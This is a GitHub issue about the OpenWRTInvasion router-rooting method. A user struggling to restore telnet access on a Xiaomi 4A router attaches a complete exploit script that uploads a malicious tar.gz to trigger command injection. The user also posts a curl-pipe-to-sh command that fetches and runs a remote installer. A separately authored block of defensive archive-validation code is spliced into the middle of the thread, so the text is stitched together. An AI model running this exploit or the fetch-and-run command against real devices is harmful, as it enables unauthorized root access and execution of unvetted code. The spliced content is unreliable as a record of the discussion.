acecilia/OpenWRTInvasion

code 1629

Closed this issue · 1 comments

{"code":1629,"msg":"解压失败,可能文件已经损坏"}

I'm one of the first users of this method, but I only used the "telnet" method, without flashing OpenWrt firmware.
The "telnet" worked well until approximately May 1st, before I installed the Aria2 Ngrok on MIXBOX. Before that day, I only had ShadowSocks on MIXBOX, and it worked well.

Finding the "telnet" method inaccessible, I reset the official firmware 2.28.62, but I still can't use "telnet". Then I started to look into "remote_command_execution_vulnerability.py" and its dependencies, and added some debug prints, as shown in the attachment.

I personally think the reason for the first breakdown is the low ROM in the 4A Gigabit. It can't install too many plugins. A complete erase of the memory may help, but I don't know how...

I would really appreciate it if someone could help me restore "telnet".

I first ran it on Windows 10. When the bug appeared, I tried Ubuntu 20.04 LTS; both failed with {"code":1629,"msg":"解压失败,可能文件已经损坏"}



Besides, I found it unnecessary to flash OpenWrt firmware if you only want SSR.
I installed MIXBOX on my 4A Gigabit using the "telnet" command line:

sh -c "$(curl -kfsSl https://monlor.coding.net/p/mbfiles/d/mbfiles/git/lfs/master/install.sh)" && source /etc/profile &> /dev/null

MIXBOX is really easy to handle, and most importantly, it will never get your router bricked.



Attachment:
remote_command_execution_vulnerability.py

#!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23. 
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress, 
# so you can control the contents of the files in the decompressed directory. 
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml, 
# and there is a command injection vulnerability.

# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security

# HOW TO RUN
# Install requirements
# pip3 install -r requirements.txt
# Run the script
# python3 remote_command_execution_vulnerability.py

import os
import shutil
import tarfile
import requests

router_ip_address = input("Router IP address: ")
# router_ip_address = "192.168.0.21"

# get stok
stok = input("stok: ")
# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"

# From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
# In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
command="((sh /tmp/script.sh exploit) &)"

# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}

if os.path.exists("build"):
    shutil.rmtree("build")
else:
    print('no build')
os.makedirs("build")

## make config file
speed_test_filename = "speedtest_urls.xml"
with open("speedtest_urls_template.xml","rt",encoding='utf-8') as f:
    template = f.read()
data = template.format(router_ip_address=router_ip_address, command=command)
print(data)

with open("build/speedtest_urls.xml",'wt',encoding='utf-8') as f:
    f.write(data)
    print('write')



# Make tar
with tarfile.open("build/payload.tar.gz", "w:gz",encoding='utf-8') as tar:
    tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")
    tar.add("script.sh")
    print('taring')

    # tar.add("busybox")
    # tar.add("extras/wget")
    # tar.add("extras/xiaoqiang")

## upload config file
print("start uploading config file...")
r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
print(r1.text)

# ## exec download speed test, exec command
# print("start exec command...")
# r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
# # print(r2.text)

# print("done! Now you can connect to the router using telnet (user: root, password: none)")
# print("In MacOS, execute in the terminal:")
# print("telnet {}".format(router_ip_address))
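
The header comment of the attached script names the root cause: the router unpacks an uploaded backup with tar zxf, so the uploader decides which files land in the extraction directory. As an added example (not part of the original issue or of the project's code), this is the server-side check that closes that gap: accept an archive only if every member is a regular file on an allowlist, and write out nothing otherwise. The member name cfg_backup.bin and all function names are assumptions made for illustration.

```python
import io
import os
import tarfile
import zlib

# Hypothetical allowlist: the only member a legitimate config backup may hold.
ALLOWED_MEMBERS = {"cfg_backup.bin"}


def check_backup_archive(data):
    """Return reasons to reject an uploaded tar.gz; an empty list means accept."""
    try:
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
            members = tar.getmembers()
    except (tarfile.TarError, OSError, EOFError, zlib.error) as exc:
        return ["not a readable tar.gz: {}".format(exc)]
    problems = []
    for m in members:
        if not m.isreg():  # symlinks, hardlinks, devices, directories
            problems.append("{}: not a regular file".format(m.name))
        elif m.name not in ALLOWED_MEMBERS:  # exact match, so no path tricks
            problems.append("{}: unexpected member".format(m.name))
    return problems


def extract_backup(data, dest_dir):
    """Write allowlisted members into dest_dir, or refuse the whole upload."""
    problems = check_backup_archive(data)
    if problems:
        raise ValueError("; ".join(problems))
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for m in tar.getmembers():
            with open(os.path.join(dest_dir, m.name), "wb") as out:
                out.write(tar.extractfile(m).read())


def make_targz(files):
    """Build an in-memory tar.gz from {name: bytes} for the constructed samples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


# Constructed samples: a plain backup, and the member names the script packs.
BENIGN = make_targz({"cfg_backup.bin": b"placeholder settings"})
UNEXPECTED = make_targz({"speedtest_urls.xml": b"<root/>", "script.sh": b"#\n"})
```

Because the check compares whole member names against the allowlist and extraction writes only those names, an archive carrying extra files is rejected before anything reaches disk.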

Sorry, I can't help you; the setup you are working with seems pretty complex. I would suggest trying to simplify your setup. You can try asking in the OpenWrt forum.